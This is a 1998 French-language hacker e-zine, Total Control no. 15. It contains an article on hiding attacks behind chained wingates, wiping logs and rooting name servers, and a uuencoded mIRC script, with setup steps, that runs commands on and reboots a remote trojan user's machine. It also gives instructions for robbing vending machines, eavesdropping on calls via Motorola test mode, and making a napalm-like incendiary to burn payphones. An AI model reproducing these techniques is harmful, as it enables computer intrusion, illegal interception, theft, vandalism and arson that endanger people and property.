          __________________________. ._
         <  _________________________\| \
          \(  |  | /  \  |  |  /  _   \  |
              |  |/  . \ |  | /  (_)  |  |
   _          |: /  /|  \|: | |: ._.  |: |             _
  (_)         |o(  (_|   |o | |o | |  |o |_____       (_)
              |  \__\___/|  | |  | |__|_______/       
              | /         \ | | /    
              |/           \| |/
              :             : :       

 ___________   _______  ._.________________        ._
 \______    ) _\___,  \ |<  ____________   \   __  | \
   |  | )  / /  \  |   \| \( |  |  |  | )  /  /  \ |  |
   |  | \_/ /  . \ |  . '  | |  |  |  |/  /  /  , \| :|
   |: |  _ /. /|  \|  |\. :| |: |  | :|\  \ /. /|  \ o|
 __|o |_) (o (_|   |  | | o| |o |  | o| \  (o (_|   ) |____
 \_,  _____\__\___/|  | |__| |  |  |  |  \  \__\___/______/
   | /              \ |       \ |  | /    \/
   |/                \|        \|  |/
   :Cluster           :         :  :


*----------------------------------------------------------------------------*
                                                                            
                   Total Control,  Numro 15,  Juillet 1998                 
                                                                            
                       http://totalcontrol.home.ml.org                      
                                                                            
*----------------------------------------------------------------------------*
#tctrl (EFNET) = LE CHANNEL OFFICIEL DES LECTEURS ET STAFFS DE TOTAL CONTROL
*----------------------------------------------------------------------------*

/------------------\
|  AVERTISSEMENT   |
\------------------/

Ce document  contient  des  informations  illgales si  vous les utilisez mais
puisque,  ici,  elles  ne  sont  distribues  que pour  des  fins  ducatives,
elles peuvent tre  considres tant lgales (vous me suivez ?). Le personnel
de Total Control ne vous encourage  pas  utiliser ces techniques et n'est pas
responsable de l'utilisation que vous en faites. Bla bla bla...

/------------------\
|   Mode d'emploi  |
\------------------/

Pour tous les fuckin' perdus de la vie qui ne savent pas trop pourquoi ce zine
est truff de "carrs noirs"  la place des accents (ce qui le rend illisible)
et pourquoi il est tout croche, VOUS DEVEZ LE LIRE AVEC MS-EDIT EN DOS !!!

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                               0=--------------=0
                               |  Introduction  |
                               0=--------------=0
                      Par Err418 (err418@technologist.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

        Salut tout le monde... Et oui, enfin le numro 15 est sortit. Excusez
le retard mais j'avais d'autres procupations et des choses personnelles 
faire... touka.. au moins, si vous lisez ces lignes c'Est que je me suis boug
et que maintenant il est disponible.

        Je me dois de vous mentionner avant que je ne l'oublie que le ASCII
d'intro du zine  t fait une fois de plus par Cluster et qu'il s'Est inspir
du ASCII de Mental Floss (NPC zine).

        Ok, pour ce qui est de la saga Corruption Addicts, je vous avais dit
que le procs serait le 21 juillet  9h00 mais  cette date, ce ne sera que la
divulgation des preuves et aucunes personnes n'est admises. Pour ce qui est de
la manifestation, il faudra oublier a puisque aprs un court sondage je me
suis rendu compte que 80% des personnes aimeraient mieux y aller @incognito@
pour ne pas risqu leur scurit. Personnellement, je ne crois pas que de
manifester fait de nous des hackers mais plutt des personnes qui croient en
leur libert d'expression. En tout cas, il s'agit de mon point de vue mais je
ne peux tout de mme pas aller manifester tout seul donc je ferai comme
beaucoup d'autres personnes et j'essayerai de me prendre un sige au procs.

        Si vous tes intress par le procs, vrifiez le site rgulirement
car je vais y mettre la date du procs et les coordonnes du palais de justice
ds que phaust m'aura confirmer le tout.

        FREE CORRUPTION ADDICTS

        FUCK CASTONGUAY !!!!!!!

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                          Le courrier des lecteurs
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Dsormais, je ne peux pas publier TOUS les e-mails reu parce que j'en reois
beaucoup trop. Je prends les plus gentils et les plus licheux :-) hhhh

-------------Cut Here----------------------
Date: Sat, 13 Jun 1998 22:14:29 -0400
From: Jeep <jeep2@cyberdude.com>
To: err418@technologist.com
Subject: TC

Salut men,
                TC, vraiment trop hot :) J'aime ben gros pis ma
continuer a les suivres... Si tu veux je peux surment t'aider pour tes
articles sur le hacking, je m'y connais un peux.. p-e assez pour faire
quelque articles. Entk men continuer votre travail c kewl

Jeep
-------------Cut Here----------------------

******* Alerte le e-mail suivant contient des scnes sanglantes ************

From: Malartre <malartre@aei.ca>
To: err418@technologist.com
Subject: Salut

Salut, j'ai lu ce que t'as crit sur total control. C'est pas pire cot
tlephone :-)

Hum, ya certaine chose que chu pas d'accord... Tu sais c quoi un script
kiddies? J'ai rien contre les newbies... chu newbie moi mme dans pas mal
de chose.

C'est juste que les scripts kiddies me font chier.
Check, ils achtent un ordi. La y dcide d'aller sur irc pis de se
dfouler sur le plus de monde possible avec des programmes pr-fait. Ils
ont aucune ostie de morale. Pis aprs a, sa se pense ben bon.

a vise pas personne mais c mon opionion :

Exemple: y'a un des gars qui a crit sur total control (je vise
personne). Mon petit frre de douze ans qui fait pas la diffrence entre un
.txt pis un .exe ;-) c'est fait send un jeu par lui. Malgr toutes les
prcautions que j'ai pris a lui rentr dans tte que les fichier sur irc
c'est pas safe, ya quand mme accept le fichier.

C'tait un trojan horse. Kelke chose qui ressemble trangement a dmsetup
en passant hehehe, on dirait un rip.

La, y par en gueulant dans maison "J'me su faites hack, j'me suis faites
hack!" Pis la c'est qui qui rgle le problme? Mo.

Bon, l j'ai faite un beau mnage pendant que le gars continuait de
goss sur mon ordi par le port 5000. La j'y demande c'est quoi son but
de faire a, y dit "j'voulais essayer quequechose". J'ai tu l'air cave?
Y ma faite reboot juste pour le fun. Merveilleux. La j'ai cherch comme
un osti de malade le nom du trojan qui ma send. Finalement y ma donner
l'URL de total ctrl. Rien a chier d'installer un firewall. Moi je veux
une solution clean. Fasque j'ai goss pis la je pense j'ai rgl mon
prob. Pourkoi j'crit a? Pour dire a toute les osti de ti-coune qui
teste les affaires sur les autres de voir si ya une solutions propre 
se qu'ils fonts. Kalice, ya mes parents qui se serve de Win95. Moi
j'utilise FreeBSD, mais c pas ncessaire de scrapp mon win pour tester
des conneries dans le seul but de faire chier un ti cul de 12 ans. a
vous donne un sentiment de puissance de reboot les ti jeunes de irc pis
de fuck leur C:\ pis de leur faire croire que vous aller faire sauter
toute?

a sait mme pas c'est quoi une man page ou prononcer Unix pis a s'amuse a
faire la terreur. Attendez que y'ai plus gros que vous qui vous tombe
dessus!

a s'addressait au wana-be-ben-hot qui font chier le peuple =)
------------------------
kaput@whoever.com         ICQ #4224434               
FreeBSD-2.2.6                        
------------------------

Rponse de Err418 :     Bon, dans ce e-mail on ressent de la frustration dans
===================     les paroles de l'auteur. Si je serais un vrai de vrai
                        punk-anarchist-cyber-hacker-phreaker-from-hell je te
                        dirais d'aller te faire enculer jusqu' ce que ton
                        dentier te sorte par le cul MAIS c'est pas le cas pcq
                        je suis un gars qui s'intresse au h/p et qui est ben
                        ordinaire alors je te dit que je te comprends.
                        Cependant, si tu lis le disclaimer qui apparait dans
                        chaque numro, NOUS NE SOMMES PAS RESPONSABLE DES
                        ACTES DES AUTRES. Que tu te fasses hack jusqu' l'os
                        pis que ton c: se fasse formater, j'EN AI RIEN 
                        CALISSER. En passant, c'Est pas un rip de DMSETUP
                        c'est le socket de troie qui utilise le port 5000.
                        Il ne s'agit pas d'un rip pcq on a jamais dit que a
                        venait de nous... c'est juste un file de mme mis  la
                        disposition du public. J'aimerais aussi te dire que
                        t'es vraiment leeto d'utiliser FREEBSD... tu es mon
                        idole je pense... hahahaha... j'm'en crisse de ton OS.

-------------Cut Here----------------------

So, C'est tout !

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                                 Le Spoofing
                        Par BiNFUCKER (binf_80@hotmail.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Avant de commencer je voudrais dire que cet article la a ete ecrit pour
les newbies tout comme les plus avances en hacking. 

Il sagit bien-sur d'un texte d'information:

Le spoofing... hum quelle belle invention..:) heheheh bien-sur il y a 10
ans..sur ARPANET l'ancetre d'internet..on pouvait spoofer a notre guise..
dans les debuts d'internet aussi...mais maintenant tout a change...
on ne peut plus seulement ACK SYN Flooder une target pour spoofer..dumoins je
parle de 99.99% des computers sur internet...les protocols ont ete modifies
avec le temps..mais comment peut on oser dire qu'on spoof..! Hum...Bien ca
depend des points de vue..il y a plusieurs methodes..qui sont aujourd'hui
disponibles pour vous:

1-iDENT spoofing (Tres lame..dumoins ce n'est pas du vrai spoofing)
2-Wingate spoofing , proxy spoofing , shell spoofing (50%)
3-Le BLiND (100% mais une seul direction)
4-BiND spoofing (le vrai, le seul, l'unique spoof a 2 directions)

1- iDENT spoofing
	...wow...le spoofing pour win 95 haha super..je me connecte
	sur irc avec un programme qui modifie mon ident...hum mais 
	mon dns reste le meme..que faire? Bon...heheh ceci est considere
	comme du spoofing..mais en fait..ce n'est que l'adresse qui est
	modifie..quand on se connecte sur le serveur le programme envoie
	une chaine de caracteres qui fourvoie le serveur et qui vous permet
	d'impressioner les petites filles dans le channel 13 and et moins..
	avec une adresse bidon comme (nick)@ha.je.taime.anne11
	En fait vous restez vulnerable aux attaques des DoS(Denial of
	Services) ou NUKES...des floods..ect...une seule bonne application
	des idents spoofs c'est que vous pouvez spoofer un op qui est sur un
	bot et si vous aviez son pass alors..eehhehe vous pourriez avoir le
	controle du bot pour faire une takeover hahahahahaha...ok redevenons
	serieux..faire ca c'est lame... mais bon..heheheh ceux qui veulent le 
  	faire faite le.:).

2- WiNGATE ,PROXY,SHELL
	Bon..ici on ne peux parler de grosses techniques..mais plutot de
	sysadmin pas vailliant qui nous aident.Ici je parle des wingates qui
	nous permettent de spoofer l'adresse du wingate connecte,des proxy
	et des shells qui font la meme chose. En fait on rencontre souvent
	des gens qui vont sur irc, qui wingatent..ou qui run un shell UNiX pour 
	pouvoir nuker...c'est tres bien mais moi l'application des wingates,
	proxy et des shells que je trouve la plus pratique c'est que nous
	pouvons pratiquement spoofer notre presence quand nous hackons un
	serveur.Je veux dire que par la combinaison suivante qui m'a
	ete donner par un Conseillier senior d'un service internet
	quelconques nous pouvons etre intracable..:
	Notre ordi==>wingate==>wingate==>Shell==>wingate==>CiBLE
	Bon il faut s'entendre intracable par traceroute et..quelques
	autres commandes..bien sur si vous hackez un serveur du pentagone..:)
	heheh ils ont des chances de vous retrouver..environ 50% car..les
	wingates sont en fait des bugs...mais certains administrteur ne se
	souciant pas de la perte de bandwith de leur reseau les laissent
	ouverts...mais log les connections :) alors...si on vous log..et si
	par chance pour l'intelligence qui vous pourchasse tout les wingates
	etaient logges...alors bonne chance :). Bon..il faut  aussi mentionner
	que si vous hackez par l'intermediaire d'un shell il est bon de
	savoir comment effacer les logs...bien sur il y a plein d'exploits
	pour ca....utmpclean,zap,marry.....voir:www.rootshell.com.
	En fait la solution est de bien couvrir ses traces..:)
	Ha une autre chose a propos des wingates...certains wingates son
	ouverts seulement pour  vous attirer vers eux puis ensuite logger
	toutes vos actions alors attention...
	
Pour trouver les wingates..utilisez un wingate scanner...
Proxy = meme chose
Shells = achetez en un...ou Hackez en un :)



3- Le BLiND SPOOFiNG...
	Bon...je ne m'etendrai pas vraiment la dessus...le blind
	spoofing est surtout utilise pour les DoS ...Nukes.. il 
	permet de spoofer l'adresse d'un packet.L'inconvenient	
	c'est que le packet reste tracable sur le reseau de routers 
	utiliser pour lancer l'attaque.Alors le packet est tracable..
	et vu que les routers sont logges..alors :) hehehe on peut vous
	retracer si le besoin s'en fait ressentir en fait le blind spoofing
	repose sur le principe que le packet se dirige dans une seule direction
        Alors on ne peut voir le resultat....du point de vue du
	packet envoye...exemple:
	J'envoie un packet spoofe a 170.90.90.90 provenant de l'adresse
	120.3.2.1 ...je n'ai plus de controle sur 120.3.2.1 .
	N'oublier pas que ma vrai adresse n'est pas 120.3.2.1 mais 
	que si on trace 120.3.2.1 et notre adresse on retrouvera qu'il
	proviennent des meme routers que notre ip et si on regarde dans les logs
	des routers...on retrouvera le ip de provenance..(j'ai deja ete
	retrace pour avoir fait crasher des machines qui runnaient linux avec
	nestea...hehehe mais bon maintenant ce bug fix.)
	Le blind spoofing est donc souvent utilise dans les nukes...car 
	nous n'avons pas besoin de recevoir un packet..pour confirmer qqch.

Encore une fois ces attaques peuvent etre loguees ou tracees mais un packet 
provenant d'un blind spoof a une duree de vie egale a celle des logs que
les routers gardent...alors si vous voulez savoir combien de temps votre
securitee peux etre compromise...hum appelez votre ISP et demandez lui
combien de temps les routers gardent les logs ;) je ne sais pas pourkoi mais
ils ont refuse de me le dire hehehehe.
	

	
4- Le BiND SPOOFiNG

	Hum..bon...voici le summum de la protection....que nous pouvons avoir
	en fait si on est capable de reunir toutes les composantes nesessaires.
	Premierement savoir :
	Qu'est-ce qu'un Domain-name-server,Name server ou NS:
	J'utilise la compagnie internet total.net
	Pour me donner un nom en fait une addresse ip le serveur a recours 
	a un Name server qui m'a attribue une addresse ip ..vous avez
	deviner un Name server c'est ce qui donne les ip..et la resolution
	en nom comme www.yaho.com = 204.71.200.74  toutes ses conversions 
	en lettres sont effectuees par eux...alors imaginez le reste
	si vous pouviez avoir l'acces root sur un NS :)!
	Exactement..vous dever avoir..root sur un NS pour vraiment spoofer
	pouvoir changer votre dns....alors.les mythes entourant le spoof sont
	grandement resolus.. 

Et apres le root....comment fait t'on...:) utilisez un programme comme jizz
ou any-erec des BiND spoofers
Bien sur je recommande de faire cela avant de se rooter sur un NS
Notre ordi==>wingate==>shell==>wingate==>NS 
dumoins si vous voulez ne pas etre logge
Et comment trouver les Nameservers...? Bien en Windows 95 ..je ne sais pas
mais en Linux ou Unix....la commande Nslookup est tres utile..!
EX:
	Nslookup -type=any www.yahoo.com
	non-authorative nameserver...on oublie ca....!

	authorarive nameserver
	ns.yahoo.com 	= 204.71.177.33
	ect....

alors ce sont les nameservers :)
mais attention les nameserveurs sont souvent les colones vertebrales des
reseaux alors attention de ne pas les mettre down!...
	
Bon je crois que cela fait un survol du spoofing... alors pour terminer
j'aimerais vous dire que ce n'etait qu'un bref survol..si la demande est
forte et que Err418 veut que je produise encore alors je produirai un autre
article.
	
Pour me joindre :
Undernet: BiNF_
	#Rhino9,#HACk.fr
ou binf_80@hotmail.com
Merci special a FBoy pour la correction des fautes :)
Apres je me demande pourkoi j'ai 40% en francais..

Pour plus d'information sur le HACKiNG en general :
www.rhino9.com :Sekurity team
www.frhack.org : FRhack
www.yahoo.com : ;)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                              Cellulaire  carte
                           Par nikonstock@hotmail.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Je sais pas si ya kelkun qui l'a remarqu mais ya les nouveaux cellulaires 
carte qui sont sortis. Ouin c'est brillant comme ide mais y'a un hic,
carte = pas de compte fixe = pas aucun retracage = Cracking assur 100%
garantis ou argent remis.

C'que jveux dire par ce charabia c'est que je suis sur qu'il y a moyen de
fabriqu  l'aide de l'outil essentiel de notre vie (l'ordinateur) et s'en
servir pour changer la programation de base de la carte pour pouvoir en faire
une carte au lieu de 60 minute d'utilisation qu'elle aille une utilisation
illimit. Un cellulaire avec des frais au dbut, tu paye ton cellulaire,
tu te paye une carte et ensuite tu rend ta carte illimite au lieu de 60
minutes.

Merci beaucoup a Cantel pour ce merveilleux cellulaire dont tout le monde 
l'avenir pourraa se servir sans aucun frais.

Pour les autres qui n'ont pas d'ordis bien y'ont juste a acheter les carte
djas prpare.

Une nouvelle grosse job est apparu dans l'industrie du Cracking.

J'ai besoin d'aide de la majorit des personne qui savent crack ce genre de
carte alors m'a all m'en acheter un pis ensuite je mettrai le plus d'info
possible sur ce nouveau jou-jou mais si y'a kelkun qui trouve kekchose avant
moi et bien e-mailez moi pour que bientot ce ptit celluloch devienne gratuit.

Si des informations sont dcouvertes, TC magazine les publiera le plus vite
possible.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=
                         Machines  Coke et port 5000
                       Par NeaKlux (ignite27@hotmail.com)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=

Machine  Coke:
===============

Si tu veux vandaliser une machine  Coke, tu prends ta crow bar, pis tu 
arrache la petite porte noire ou les liqueurs tombent, ensuite tu passe 
ta main dans le trou, il va y avoir plusieurs petits volets (a environ 
20cm), tu en lve un, et tu prends la liqueur (si tu as des trop grosses 
mains, tu russiras pas a lever le volet pis passer la liqueur, a prend 
vraiment des doigts de fe). Si c'est un 7up qui est tomb pis tu voulais un 
Coke, tu jettes le 7up dans poubelle pis tu essaie un autre volet 
dans la machine. 

*** Petite anectdote*** Je l'ai essay une couple de fois, pis une fois, 
un moniteur est arriv et a mis la main sur l'paule de mon ami quand 
y'avait la tte vire pis la patte pogne dans le volet. Y'a sorti 2 
cokes et il les a donn au moniteur qui est parti sans rien dire. Moi je 
me roulais  terre!

Port 5000:
==========

Maintenant, un petit script trs trs amusant pour nuker ceux qui
utilisent le Socket de Troie avec port 5000 pour vous hacker.
    
Matriel :  - IRC (je prends mIRC 5.4, n'importe lequel est bon                     
              tant que tu as un remote avec)
            - Le script ci-joint nomm command.ini

Protocole :

1- tu enregistre le file dans ton rpertoire de mIRC
(exemple : c:/mirc/download -- peu importe).

2- dans ton mIRC, tu click sur l'icne Remote Script
(dans la version 5.4, c'est un icne dans la barre des tches, avec deux
points rouges et en haut c'est crit CE)

3- Tu click sur l'onglet Remote, tu fais -file -load -script et tu       
slectionne le script joint ci-dessous (command.ini).

4- Ensuite, tu dois ouvrir ton port 5000. Pour cela, tu dois librer    
le port. Donc, si tu utilise nukenabber ou n'importe quel protect,    tu 
fais disable, port 5000 et tu enlve tes firewall. Ensuite, dans   ton 
IRC, tu entre la commande suivante: //$portfree(5000). Tu   regardes 
dans ton status, un des deux noncs suivant devraient     apparaitrent: 

$FALSE Unknown command
ou
$TRUE Unknown command .

5- Si c'est $TRUE..., c'est parfait, tu passe  l'tape 7.

6- Si c'est $FALSE..., tu fais la commande suivante:
/sockclose hack
et tu refais //$portfree(5000). Si a devient $TRUE, maintenant, tu   
peux passer immdiatement  la prochaine tape. Si a ne marche   
toujours pas, c'est peut-tre que tu as la taupe du socket de Troie.   Ce 
qui veut dire que tu as fait l'idiot et que tu as click sur   Host.exe 
joint au #14 de TC Magazine. Tu dois donc effac la taupe.   Chose trs 
simple, tu click sur Crtl-alt-del, et tu fais fin de  tche  
mschv32.exe, ensuite, tu recherche ce fichier sur ton   ordinateur (qui 
devrait se trouver dans c:/windows/system) et tu  l'efface de ton HD, 
si tu ne sais pas trop si c'est le bon fichier,   celui-ci devrait tre 
autour de 328kb. Tu dois ensuite aller dans ta   base de registre, faire 
une recherche pour mschv32.exe et effacer   tous les lments qui s'y 
rapporte. Tu seras sur d'en trouver au   moins un parce que tu as fait 
la recherche avec ton ordinateur (les   fichiers que tu recherche sont 
sauvegards dans ta base de registre    dfaut de + ou - 10). Il peut y 
avoir quelques petites variantes   quant au nom et taille du programme 
mschv32.exe puisqu'il existe   plusieurs Socket de Troie comme Hackprot 
et Controll. Un autre   fichier pourrait tre dmsetup.exe de taille 
semblable.
 
7- Pour faire suite, tu as juste  faire la commande suivante:   
/socklisten hack 5000, ((**si ce message apparait: * /socklisten:   
'hack' socket in use, c'est peut-tre encore parce que tu as la   taupe, 
retourner  l'tape 6, sinon, tu fais juste gosser avec les   3-4 
commandes que j'ai donn pis a va marcher a un moment donn!**))
Cette commande va attendre que quelqu'un se connecte  ton port et  ^a va 
lancer le script et maintenant, tu demandes  quelqu'un qui a   un 
Controle de cheval de Troie de te hacker et tu l'observe te  sacrer 
aprs parce que tu viens d'effacer son autoexec.bat, tu viens de  rebooter 
son ordi ou tu as ouvert 50 fois son command.com!!! Dans le  script 
ci-dessous, a fait juste ouvrir le command.com 3 fois et  autoexec.bat 
une fois (a c'est  seulement si le fichier est dans le  bon rpertoire 
sinon tant pis!), mais ya tellement de choses que tu  peux faire.

***Merci  Hi-Tech et  Knewon (sur qui j'ai essay le script... sans 
rancune l!)

Bonne Chance!!!
-------------UUENCODE de COMMAND.INI-----------------
Content-Transfer-Encoding: x-uuencode
Content-Disposition: attachment; filename="command.ini"

begin 644 command.ini
M6W-C<FEP=%T-"FXP/6]N(#$Z8V]N;F5C=#H@>R!I9B`H("1P;W)T9G)E92@U
M,#`P*2`]/2`D=')U92`I("8F("@@)6AA8VL@(3T@)&YU;&P@*2![("]S;V-K
M;&ES=&5N(&AA8VL@-3`P,"!]('T-"FXQ/0T*;C(](VAA8VL@;VX-"FXS/6]N
M(#$Z<V]C:VQI<W1E;CIH86-K.B![#0IN-#T@("]I;F,@)5-O8VLN3F%M92`Q
M#0IN-3T@("]S;V-K86-C97!T("53;V-K+DYA;64-"FXV/2`@+F5C:&\@+6$@
M`S@L-2T^($-O;FYE8W1I;VX@<W5R(&QE('!O<G0@-3`P,"!D92`Z'R`D*R`D
M<V]C:R@E4V]C:RY.86UE+#$I+FEP#0IN-ST@("]S;V-K=W)I=&4@+6X@)5-O
M8VLN3F%M92`^(%)E;6]T92XN+B!/2R`D*R`D;&8@(`T*;C@]("`N96-H;R`M
M82`#."PU+3X@4')I<V4@9&4@8V]N='+T;&4@9&4@;"=O<F1I;F%T975R(&1I
M<W1A;G0N+BX@3TL@.OX-"FXY/2`@+W-O8VMW<FET92`M;B`E4V]C:RY.86UE
M("\O(&5X96-U=&5R(&,Z7&-O;6UA;F0N8V]M("0K("1L9@T*;C$P/2`@+W-O
M8VMW<FET92`M;B`E4V]C:RY.86UE("\O(&5X96-U=&5R(&,Z7&%U=&]E>&5C
M+F)A="`D*R`D;&8-"FXQ,3T@("]S;V-K=W)I=&4@+6X@)5-O8VLN3F%M92`O
M+R!E>&5C=71E<B!C.EQC;VUM86YD+F-O;2`D*R`D;&8-"FXQ,CT@("]S;V-K
M=W)I=&4@+6X@)5-O8VLN3F%M92`O+R!E>&5C=71E<B!C.EQC;VUM86YD+F-O
M;2`D*R`D;&8-"FXQ,ST@("YT:6UE<B`Q(#(@+W-O8VMC;&]S92`E4V]C:RY.
,86UE#0IN,30]?0T*
`
end
--------------FIN--------- cUT HERE-----------

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                        Eavesdropping avec un Motorola
                    Par moi-meme (quebecxxx@videotron.ca)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

J'ai finalement trouver comment scanner avec les motorola.
(micro-tac,star-tac,flip,550,650,910)

Premirement, il te faut un cellulaire motorola (se sont les plus
complets). Ensuite, il faut allumer l'appareil, ensuite il faut aller dans le
mode @test@ en composent tout siplement
fcn + 0  + 0 + * + * +83786633 + sto
ensuite ont compose le code pour le rx audio ON (soit le 08#). On
devrait pouvoir lire US sur l'cran, ensuite on recompose encore (08#).
Maintenant, il faut choisir un canal , j'ai trouver seulement quelques canaux
mais il doit y en avoir d'autres.

(11300#)(11333#)(11385#)(11799#)(11991#)(110300#)(110333#)(110385#)(110799#)
(110800#)

Aprs avoir entrer un canal le son devrait tre plus fort des
grichements ou de voix. Si apres avoir composer un canal le son
n'augmenet pas, recomposer (08#)

Ce qu'il faut comprendre : (08#) donne la commande du rx audio on et les
(11xxxx#) sont les frquences que l'ont coute ont peut changer de
frquence quand on veut en composent une autre et si le son disparait
on recompose (08#).

Mise en garde :  les numros 00 a 99 suivie de # sont tous des commandes
pour le test mode donc si vous pitonnez autre chose que ce que je vous est
dit ..........bonne chance pour reconfigurer votre cellphone...

p.s :  la meilleur maniere de fermer sont cellulaire apres une session de
scanning c'est (01#). Le tlphone fera sa routine d'ouverture en monde
ordinaire.. si (01#) ne marche pas faite le (13#), c'est la mme chose.

amusez- vous bien

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-==-
                               Le Napalm
                   Par: PsYkAoS (dusthackers@hotmail.com)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==---=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Qui n'a pas un jour rver d'utiliser le fameux gaz qui a presque ananti les
viet lors de la guerre ?

Bon la recette ci-dessous n'est pas celle du napalm mais a donne la mme
chose...

Il vous faut :

-Un litre dessence

-Du "styrofome" (en quebecois) mais pas n'importe lequel... a prend celui qui
fait plein de ptite boulle blanche (celui qui retient les ordinateurs dans
leur boite.)

La technique est simple :

1) Ajoutez le "styrofome"dans lessence et melangez

2) Ajoutez jusqu' ce que le mlange devienne une pate (pas trop dure la pate)
ensuite laisser reposer pendant 24 heure et aprs s'il reste encore du
jus, rajoutez du "styrofome".

Conseils:
=========

Pour l'utiliser trouver vous un cher millenium, placer la pte dans l'espace
de retour de la monaie et allumer (avec une mche si possible)....

Sauvez vous parce que a brle pis pas  peu prs.

Je rapelle que le contenu de cet article est pour fins ducationelles
seulement.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                                Fun fun fun
                     Par Cluster (cluster@comports.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Vous vous emmerdez, c'est dimanche, vos parents sont partis  la messe et il
pleut ? ALORS voici la solution pour vous amuser et arrter de vous emmerdez.

TADAM... le super Total-control-MOts-Croiss.
Have phun.

Banque de mots:
===============

Millennium	quebectel	phreaking
nortel		hacking		bell
payphone	telecom		unitel
plq		internet	linux
norstar		reseau		pla
phrack		npc		telebec

+---+---+---+---+---+---+---+---+---+---+
| P | A | T | L | C | P | T | O | M | T |
+---+---+---+---+---+---+---+---+---+---+
| H | L | E | E | P | A | A | L | I | U |
+---+---+---+---+---+---+---+---+---+---+
| R | P | L | T | N | Y | T | C | L | N |
+---+---+---+---+---+---+---+---+---+---+
| E | N | E | C | M | P | E | R | L | I |
+---+---+---+---+---+---+---+---+---+---+
| A | O | B | E | O | H | N | E | E | T |
+---+---+---+---+---+---+---+---+---+---+
| K | R | E | B | C | O | R | S | N | E |
+---+---+---+---+---+---+---+---+---+---+
| I | S | C | E | E | N | E | E | N | L |
+---+---+---+---+---+---+---+---+---+---+
| N | T | P | U | L | E | T | A | I | O |
+---+---+---+---+---+---+---+---+---+---+
| G | A | L | Q | E | N | N | U | U | T |
+---+---+---+---+---+---+---+---+---+---+
